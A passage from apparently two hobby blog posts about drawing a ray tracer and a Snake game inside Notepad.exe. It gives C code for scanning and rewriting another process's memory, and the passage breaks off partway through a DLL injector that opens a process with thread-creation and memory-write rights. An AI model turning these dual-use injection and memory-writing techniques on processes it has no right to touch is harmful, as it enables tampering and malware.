<p>Note that if you want to use Spy++ yourself, you probably want to use the 64 bit version of it, which is inexplicably <em>not</em> the verion that Visual Studio 2019 launches by default. Instead you’ll need to search your Visual Studio Program files for “spyxx_amd64.exe.”</p>
<p>It took about 10 seconds after getting this working to realize that even if I could find a non-janky way to use window messages to draw full game screens into Notepad, it would be way too slow to even come close to approaching a 30hz refresh cycle. It was also really boring, so I didn’t spend too long looking for ways to make it go any faster.</p>
<h2 id="cheatengine-for-good-guys">CheatEngine For Good Guys</h2>
<p>While getting the fake key input set up, I was reminded of <a href="https://www.cheatengine.org/">CheatEngine</a>. It’s a program that let’s users find and modify memory in processes running on their machines. Most of the time it’s used by people trying to cheat at games or do other stuff that makes game devs sad, but it turns out if can also be a force for good.</p>
<p>Memory Scanners like CheatEngine work by finding all the memory addresses in a target process which contain a specific value. Let’s say you’re playing a game and you want to give yourself more health, you could follow a process that look like this:</p>
<ul>
<li>Use a memory scanner to find all addresses in the game’s memory that store the value of your health (let’s say 100).</li>
<li>Do something in game to modify your health to a new value (like 92).</li>
<li>Search all the addresses you found previously (that stored 100) to find ones that now store 92.</li>
<li>Repeat this process until you have a single memory address (which most likely is where your health is stored)</li>
<li>Modify the value at that address</li>
</ul>
<div align="center">
<img src="/images/post_images/2020-05-20/cheatengine.PNG" />
<font size="2">CheatEngine and Notepad, friends at last</font>
<br /><br />
</div>
<p>This is pretty much what I did, except instead of a health value, I searched for memory that stored the string of text currently displayed in Notepad. After some trial and error, I was able to use CheatEngine to find (and change) the text being displayed. I also learned three important bits of info about Notepad:</p>
<ul>
<li>Notepad’s edit window stores on screen text in UTF-16, even if the bottom right part of the window says your file is UTF-8</li>
<li>If I kept deleting and retyping the same string, CheatEngine would start finding multiple copies of this data in memory (possibly the undo buffer?)</li>
<li>I couldn’t replace the displayed text with a longer string, meaning that Notepad wasn’t preallocating a text buffer up front</li>
</ul>
<h2 id="building-a-memory-scanner">Building A Memory Scanner</h2>
<p>Despite not being able to modify the length of the text buffer, this seemed promising enough that I decided to write my own small memory scanner to embed in my project.</p>
<p>I couldn’t find a lot of information about building memory scanners, but I did find a great <a href="https://nullprogram.com/blog/2016/09/03/">blog post</a> by Chris Wellons that talks about (and links to) a memory scanner that he wrote for his own cheat tool. Using that blog post and the bit of experience I had with CheatEngine, I was able to piece together that the basic algorithm for a memory scanner looks something like this:</p>
<pre>
FOR EACH block of memory allocated by our target process
IF that block is committed and read/write enabled
Scan the contents of that block for our byte pattern
IF WE FIND IT
return that address
</pre>
<p>My whole memory scanner implementation only ended up being ~40 lines of code, so I’m just going to walk through all of it.</p>
<h3 id="iterating-over-a-process-memory">Iterating Over A Process’ Memory</h3>
<p>The first thing a memory scanner needs to be able to do is iterate over a process’ allocated memory.</p>
<p>Since the range of virtual memory for every 64 bit process on windows is the same (0x00000000000 through 0x7FFFFFFFFFFF), I started by making a pointer to address 0 and used <a href="https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualqueryex">VirtualQueryEx</a> to get information about that virtual address for my target program.</p>
<p>VirtualQueryEx groups continguous pages that have identical memory attributes into MEMORY_BASIC_INFORMATION structs, so it’s likely that the struct returned by VirtualQueryEx for a given address contains information about more than 1 page. The returned MEMORY_BASIC_INFORMATION stores this shared set of memory attributes, along with the address of the start of its span of pages, and size of the whole span.</p>
<p>Once I had the first MEMORY_BASIC_INFORMATION struct, iterating through memory was just a matter of adding the current struct’s BaseAddress and RegionSize members together, and feeding the new address to VirtualQueryEx to get the next set of contiguous pages.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">char</span><span class="o">*</span> <span class="nf">FindBytePatternInProcessMemory</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pattern</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">patternLen</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">basePtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
<span class="n">MEMORY_BASIC_INFORMATION</span> <span class="n">memInfo</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">VirtualQueryEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">basePtr</span><span class="p">,</span> <span class="o">&</span><span class="n">memInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MEMORY_BASIC_INFORMATION</span><span class="p">)))</span>
<span class="p">{</span>
<span class="k">const</span> <span class="n">DWORD</span> <span class="n">mem_commit</span> <span class="o">=</span> <span class="mh">0x1000</span><span class="p">;</span>
<span class="k">const</span> <span class="n">DWORD</span> <span class="n">page_readwrite</span> <span class="o">=</span> <span class="mh">0x04</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">memInfo</span><span class="p">.</span><span class="n">State</span> <span class="o">==</span> <span class="n">mem_commit</span> <span class="o">&&</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">Protect</span> <span class="o">==</span> <span class="n">page_readwrite</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// search this memory for our pattern</span>
<span class="p">}</span>
<span class="n">basePtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">memInfo</span><span class="p">.</span><span class="n">BaseAddress</span> <span class="o">+</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The above code above skips ahead a bit and also determines if a set of pages has been committed and is read/write enabled, by examining the .State and .Protect struct members. You can find all the possible values for these vars in the documentation for <a href="https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-memory_basic_information">MEMORY_BASIC_INFORMATION</a>, but the values that my scanner cared about were a state of 0x1000 (MEM_COMMIT) and a protection level of 0x04 (PAGE_READWRITE).</p>
<h3 id="searching-a-process-memory-for-a-byte-pattern">Searching A Process’ Memory For a Byte Pattern</h3>
<p>It’s not possible to read data in a different process’ address space directly (or at least, I didn’t stumble on how to do it). Instead, I first needed to copy the contents of a page range to the memory scanner’s address space. I did this with <a href="https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-readprocessmemory">ReadProcessMemory</a>.</p>
<p>Once the memory was copied to a locally visible buffer, searching it for a byte pattern was easy enough. To make things simpler, I ignored the possibility that there could be multiple copies of the target byte pattern in memory in my first scanner implementation. I ended up coming up with a hacky workaronud for this problem later on that saved me from ever having to actually address it in my scanner logic.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">char</span><span class="o">*</span> <span class="nf">FindPattern</span><span class="p">(</span><span class="kt">char</span><span class="o">*</span> <span class="n">src</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">srcLen</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pattern</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">patternLen</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">cur</span> <span class="o">=</span> <span class="n">src</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">curPos</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">curPos</span> <span class="o"><</span> <span class="n">srcLen</span><span class="p">){</span>
<span class="k">if</span> <span class="p">(</span><span class="n">memcmp</span><span class="p">(</span><span class="n">cur</span><span class="p">,</span> <span class="n">pattern</span><span class="p">,</span> <span class="n">patternLen</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">){</span>
<span class="k">return</span> <span class="n">cur</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">curPos</span><span class="o">++</span><span class="p">;</span>
<span class="n">cur</span> <span class="o">=</span> <span class="o">&</span><span class="n">src</span><span class="p">[</span><span class="n">curPos</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If FindPattern() returned a match pointer, it’s address needed to be converted to the address of the same bit of memory in the target process’ address space. To do that, I subtracted the starting address of the local buffer from the address that was returned from FindPattern to get an offset, and then added that to the base address of the memory chunk in the target process. You can see this below.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">char</span><span class="o">*</span> <span class="nf">FindBytePatternInProcessMemory</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pattern</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">patternLen</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MEMORY_BASIC_INFORMATION</span> <span class="n">memInfo</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">basePtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">VirtualQueryEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">basePtr</span><span class="p">,</span> <span class="o">&</span><span class="n">memInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MEMORY_BASIC_INFORMATION</span><span class="p">))){</span>
<span class="k">const</span> <span class="n">DWORD</span> <span class="n">mem_commit</span> <span class="o">=</span> <span class="mh">0x1000</span><span class="p">;</span>
<span class="k">const</span> <span class="n">DWORD</span> <span class="n">page_readwrite</span> <span class="o">=</span> <span class="mh">0x04</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">memInfo</span><span class="p">.</span><span class="n">State</span> <span class="o">==</span> <span class="n">mem_commit</span> <span class="o">&&</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">Protect</span> <span class="o">==</span> <span class="n">page_readwrite</span><span class="p">){</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">remoteMemRegionPtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">memInfo</span><span class="p">.</span><span class="n">BaseAddress</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">localCopyContents</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">);</span>
<span class="n">SIZE_T</span> <span class="n">bytesRead</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ReadProcessMemory</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">BaseAddress</span><span class="p">,</span> <span class="n">localCopyContents</span><span class="p">,</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">,</span> <span class="o">&</span><span class="n">bytesRead</span><span class="p">)){</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">match</span> <span class="o">=</span> <span class="n">FindPattern</span><span class="p">(</span><span class="n">localCopyContents</span><span class="p">,</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">,</span> <span class="n">pattern</span><span class="p">,</span> <span class="n">patternLen</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">match</span><span class="p">){</span>
<span class="kt">uint64_t</span> <span class="n">diff</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">match</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)(</span><span class="n">localCopyContents</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">processPtr</span> <span class="o">=</span> <span class="n">remoteMemRegionPtr</span> <span class="o">+</span> <span class="n">diff</span><span class="p">;</span>
<span class="k">return</span> <span class="n">processPtr</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">free</span><span class="p">(</span><span class="n">localCopyContents</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">basePtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">memInfo</span><span class="p">.</span><span class="n">BaseAddress</span> <span class="o">+</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>If you want to see a working example of this, check out the “MemoryScanner” project in <a href="https://github.com/khalladay/render-with-notepad/tree/master/Render-With-Notepad/MemoryScanner">the github repo</a> that accompanies this blog post. Try it on Notepad! (it hasn’t been tried on anything else, so ymmv).</p>
<h3 id="using-utf-16-byte-patterns">Using UTF-16 Byte Patterns</h3>
<p>Remember from earlier that Notepad stores its on screen text buffer as UTF-16 data, so the byte pattern that gets fed to FindBytePatternInMemory() also has to be UTF-16. For simple strings, this just involves adding a zero byte after every character. The MemoryScanner project in github does this for you:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//convert input string to UTF16 (hackily)</span>
<span class="k">const</span> <span class="kt">size_t</span> <span class="n">patternLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">pattern</span> <span class="o">=</span> <span class="n">new</span> <span class="kt">char</span><span class="p">[</span><span class="n">patternLen</span><span class="o">*</span><span class="mi">2</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">patternLen</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">){</span>
<span class="n">pattern</span><span class="p">[</span><span class="n">i</span><span class="o">*</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">][</span><span class="n">i</span><span class="p">];</span>
<span class="n">pattern</span><span class="p">[</span><span class="n">i</span><span class="o">*</span><span class="mi">2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<h2 id="updating-and-redrawing-notepads-edit-control">Updating and Redrawing Notepad’s Edit Control</h2>
<p>Once I had the address of the displayed text buffer in Notepad, the next step was to use <a href="https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory">WriteProcessMemory</a> to modify it. Writing code for that was trivial, but I quickly learned that just writing to the text buffer wasn’t enough to make Notepad redraw it’s Edit control.</p>
<p>Luckily the Win32 api had my back on this, and provides the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-invalidaterect">InvalidateRect</a> function to force a control to redraw itself.</p>
<p>All together, modifying the displayed text in Notepad something looked like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">UpdateText</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">process</span><span class="p">,</span> <span class="n">HWND</span> <span class="n">editWindow</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">notepadTextBuffer</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">replacementTextBuffer</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">size_t</span> <span class="n">written</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">notepadTextBuffer</span><span class="p">,</span> <span class="n">replacementTextBuffer</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="o">&</span><span class="n">written</span><span class="p">);</span>
<span class="n">RECT</span> <span class="n">r</span><span class="p">;</span>
<span class="n">GetClientRect</span><span class="p">(</span><span class="n">editWindow</span><span class="p">,</span> <span class="o">&</span><span class="n">r</span><span class="p">);</span>
<span class="n">InvalidateRect</span><span class="p">(</span><span class="n">editWindow</span><span class="p">,</span> <span class="o">&</span><span class="n">r</span><span class="p">,</span> <span class="nb">false</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<h2 id="from-memory-scanner-to-renderer">From Memory Scanner to Renderer</h2>
<p>The gap between a working memory scanner and a full fledged notepad renderer is surprisingly small. There were only three issues that needed to be sorted out to go from what I’ve described so far to the ray tracer teased at the beginning of this post.</p>
<p>These issues were:</p>
<ul>
<li>I needed to control the size of the Notepad window</li>
<li>I still couldn’t expand the size of the on screen text buffer</li>
<li>My memory scanner didn’t handle duplicate byte patterns.</li>
</ul>
<p>The first issue wasn’t much of a problem on it’s own. It was trivial to add a call to <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-movewindow">MoveWindow</a>, but I included it in the list because this was an important part of how I approached the next issue on the list.</p>
<p>I ended up hard coding the size I wanted my Notepad window to be, and then counted how many characters (of a monospace font) it would take to exactly fill a window of that size. Then after calling MoveWindow, I pre-allocated the on screen text buffer by sending that many WM_CHAR messages to Notepad. This felt like cheating, but the good kind of cheating.</p>
<p>To make sure that I always had a unique byte pattern to search for, I just randomized which chars I sent in the WM_CHAR messages.</p>
<p>I’ve included what this might look like in code. The actual code in the github repo is formatted a little bit differently, but works the same way.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">PreallocateTextBuffer</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">processId</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HWND</span> <span class="n">editWindow</span> <span class="o">=</span> <span class="n">GetWindowForProcessAndClassName</span><span class="p">(</span><span class="n">processId</span><span class="p">,</span> <span class="s">"Edit"</span><span class="p">);</span>
<span class="c1">// it takes 131 * 30 chars to fill a 1365x768 window with Consolas (size 11) chars</span>
<span class="n">MoveWindow</span><span class="p">(</span><span class="n">instance</span><span class="p">.</span><span class="n">topWindow</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="mi">1365</span><span class="p">,</span> <span class="mi">768</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span>
<span class="kt">size_t</span> <span class="n">charCount</span> <span class="o">=</span> <span class="mi">131</span> <span class="o">*</span> <span class="mi">30</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">utf16BufferSize</span> <span class="o">=</span> <span class="n">charCount</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">frameBuffer</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">utf16BufferSize</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">charCount</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">){</span>
<span class="kt">char</span> <span class="n">v</span> <span class="o">=</span> <span class="mh">0x41</span> <span class="o">+</span> <span class="p">(</span><span class="n">rand</span><span class="p">()</span> <span class="o">%</span> <span class="mi">26</span><span class="p">);</span>
<span class="n">PostMessage</span><span class="p">(</span><span class="n">editWindow</span><span class="p">,</span> <span class="n">WM_CHAR</span><span class="p">,</span> <span class="n">v</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">frameBuffer</span><span class="p">[</span><span class="n">i</span> <span class="o">*</span> <span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">v</span><span class="p">;</span>
<span class="n">frameBuffer</span><span class="p">[</span><span class="n">i</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x00</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">Sleep</span><span class="p">(</span><span class="mi">5000</span><span class="p">);</span> <span class="c1">//wait for input messages to finish processing...it's slow. </span>
<span class="c1">//Now use the frameBuffer as the unique byte pattern to search for</span>
<span class="p">}</span></code></pre></figure>
<p>What this meant for the end product is that immediately after starting, I had to watch my Notepad window slowly fill up with random characters, before I could acquire the text buffer pointer and clear the screen.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/init.gif" />
<br /><br />
</div>
<p>All of the above relies on using a known font face and font size in order to work right. I was going to add some code to force notepad to use the fonts I wanted (Consolas, 11pt), but for some reason sending WM_SETFONT messages kept messing up how fonts were displaying, and I didn’t feel like figuring out what was going wrong there. Consolas 11pt was the default Notepad font on my system, which was good enough for me.</p>
<h2 id="ray-tracing-in-notepad">Ray Tracing In Notepad</h2>
<p>Explaining how to build a ray tracer is well beyond the scope of what I want to talk about in this post. If you’re unfamiliar with ray tracing in general, head over to <a href="https://www.scratchapixel.com/">ScratchAPixel</a> and learn you some ray tracing for great good. What I want to finish off this post with is a quick discussion of the nuts and bolts of hooking a ray tracer up to all the stuff I just talked about.</p>
<p>It probably makes sense to start off with the frame buffers. In order to minimze the amount of WriteProcessMemory calls (both for sanity and performance), I allocated a ray-tracer-local buffer that was the same size as Notepad’s text buffer (number of characters * 2 (because UTF16)). All the rendering calculations would write to this local buffer until the end of the frame, when I used a single WriteProcessMemory call to replace the entire contents of Notepad’s buffer at once. This led to a really simple set of functions for drawing:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">drawChar</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">int</span> <span class="n">y</span><span class="p">,</span> <span class="kt">char</span> <span class="n">c</span><span class="p">);</span> <span class="c1">//local buffer</span>
<span class="kt">void</span> <span class="nf">clearScreen</span><span class="p">();</span> <span class="c1">// local buffer</span>
<span class="kt">void</span> <span class="nf">swapBuffersAndRedraw</span><span class="p">();</span> <span class="c1">// pushes changes and refreshes screen. </span></code></pre></figure>
<p>On the ray tracing side, given the low resolution of my render target (131 x 30), I had to keep things very simple, since there just wasn’t enough “pixels” to display fine detail nicely. I ended up only tracing a single primary ray, and a shadow ray for each pixel being rendered to, and I thought about ditching the shadows until I found a nice grayscale float to ascii color ramp <a href="http://paulbourke.net/dataformats/asciiart/">on Paul Bourke’s website</a>. Having such a low complexity scene and small render surface also meant that I didn’t end up needing to parallelize the rendering at all.</p>
<p>I also ran into some issues getting things to look right due to characters being taller than they are wide. In the end, I “fixed” this by halving the width value I used in my aspect ratio calculations.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">float</span> <span class="n">aspect</span> <span class="o">=</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">5</span><span class="n">f</span> <span class="o">*</span> <span class="n">SCREEN_CHARS_WIDE</span><span class="p">)</span> <span class="o">/</span> <span class="kt">float</span><span class="p">(</span><span class="n">SCREEN_CHARS_TALL</span><span class="p">);</span></code></pre></figure>
<p>The one remaining problem that I haven’t found a workable solution for is that updating the contents of the Notepad’s edit control so frequently causes a very noticeable flicker. I tried a bunch of different things to get rid of this, including trying to double buffer the edit control by allocating twice the number of characters and using WM_VSCROLL messages to “swap” the buffer by adjusting the scroll bar position. Unfortunately nothing I tried worked, and the flicker remains.</p>
<h2 id="part-2-input-boogaloo-is-available-now">Part 2: Input Boogaloo is Available Now!</h2>
<p>The next (and final) part of my quest to make a real-time game in Notepad was to figure out how to handle user input. If you’ve gotten this far and are thirsty for more, the next post is <a href="/blog/2020/05/20/Hooking-Input-Snake-In-Notepad.html">available here</a>!</p>
Hooking Keyboard Input To Play Snake In Notepad.exe2020-05-20T00:00:00+00:00http://kylehalladay.com/blog/2020/05/20/Hooking-Input-Snake-In-Notepad<style>
.collapsible {
padding: 10px;
background-color: #F5F5F5;
border-style: solid;
border-color: #333333;
border-width: 2px;
}
.collapsewrapper2 {
padding: 0px 0px 18px 0px;
}
</style>
<p>This is second (and last) post about my quest to make a real-time game playable in stock Notepad.exe. In <a href="/blog/2020/05/20/Rendering-With-Notepad.html">the previous article</a>, I talked through using a quick and dirty memory scanner to get access to Notepad’s on screen text buffer (and build a ray tracer that rendered into it). In this post I’m going to talk about how I handled getting user input, and finally ended up at a fully playable Snake game in stock Notepad.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/snake3.gif" />
<font size="2">The flickering problem from last time is still very not-fixed</font>
<br /><br />
</div>
<h2 id="babys-first-dll-injection">Baby’s First DLL Injection</h2>
<p>The title of this post gives away the fact that I ended using hooks to capture user input, but I originally thought I could do it with just DLL injection instead. I barely knew what DLL injection was but I knew it could cause things to happen in an already running process. This seemed like a decent place to start. As it turns out, you need to understand dll injection to work with hooks anyway, so it’s not a bad spot to start this blog post too.</p>
<p>I started by googling the hell out of “DLL injection,” and found <a href="http://deniable.org/windows/inject-all-the-things">this excellent article</a> that breaks down what DLL Injection is and has a great <a href="https://github.com/fdiskyou/injectAllTheThings">github repo</a> with examples of different ways to go about it. I didn’t have a clue about how I was going to use any of this capture keyboard input, but I figured I’d try to inject something simple into a running Notepad process anyway.</p>
<p>Based on the injection article I just linked, the easiest way to inject a dll seems to be:</p>
<ul>
<li>Create a DLL that performs some action in dllmain when it is loaded</li>
<li>Open a handle (“attach”) to a running process</li>
<li>Allocate some memory in that process’ address space</li>
<li>Use LoadLibrary to load that DLL into that process</li>
<li>When it loads, that DLL does the stuff in dllmain</li>
</ul>
<p>Writing a DLL that does something in dllmain() is really easy if you aren’t doing a whole lot with it. I found later on that there’s a whole lot of stuff that you can’t do in dllmain (more info <a href="https://docs.microsoft.com/en-us/windows/win32/dlls/dllmain">here</a>), but for my first test project I just popped open a message box. The entire code for the DLL payload was just a few lines.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//a small dll payload that spawns a message box in whatever process loads the dll</span>
<span class="cp">#define WIN32_LEAN_AND_MEAN
#include <windows.h>
</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">ul_reason_for_call</span><span class="p">){</span>
<span class="k">case</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">:</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="s">"Process attach!"</span><span class="p">,</span> <span class="s">"Woohoo"</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The tricky part, as you might imagine, was getting Notepad to load this in the first place. Just like the above payload, my injection code was almost entirely copied from the <a href="https://github.com/fdiskyou/injectAllTheThings">InjectAllTheThings repo</a> I linked above. Unlike the payload, it’s a lot longer. I’m including it here because if you’ve never seen how to do this before, I assume this will be more convenient than having to click a link to github, but I’m not going to dive into how it works because the article/repo I linked above can teach you about it a whole lot better than I can.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full DLL Injection Code (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process</span>
<span class="c1">// usage: Injector_LoadLibrary <process name> <path to dll> </span>
<span class="cp">#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
</span>
<span class="kt">void</span> <span class="nf">printHelp</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Injector_LoadLibrary</span><span class="se">\n</span><span class="s">Usage: Injector_LoadLibrary <process name> <path to dll></span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">createRemoteThread</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">processID</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">dllPath</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">handle</span> <span class="o">=</span> <span class="n">OpenProcess</span><span class="p">(</span>
<span class="n">PROCESS_QUERY_INFORMATION</span> <span class="o">|</span> <span class="c1">//Needed to get a process' token</span>
<span class="n">PROCESS_CREATE_THREAD</span> <span class="o">|</span> <span class="c1">//for obvious reasons</span>
<span class="n">PROCESS_VM_OPERATION</span> <span class="o">|</span> <span class="c1">//required to perform operations on address space of process (like WriteProcessMemory)</span>
<span class="n">PROCESS_VM_WRITE</span><span class="p">,</span> <span class="c1">//required for WriteProcessMemory</span>
<span class="n">FALSE</span><span class="p">,</span> <span class="c1">//don't inherit handle</span>
<span class="n">processID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">handle</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
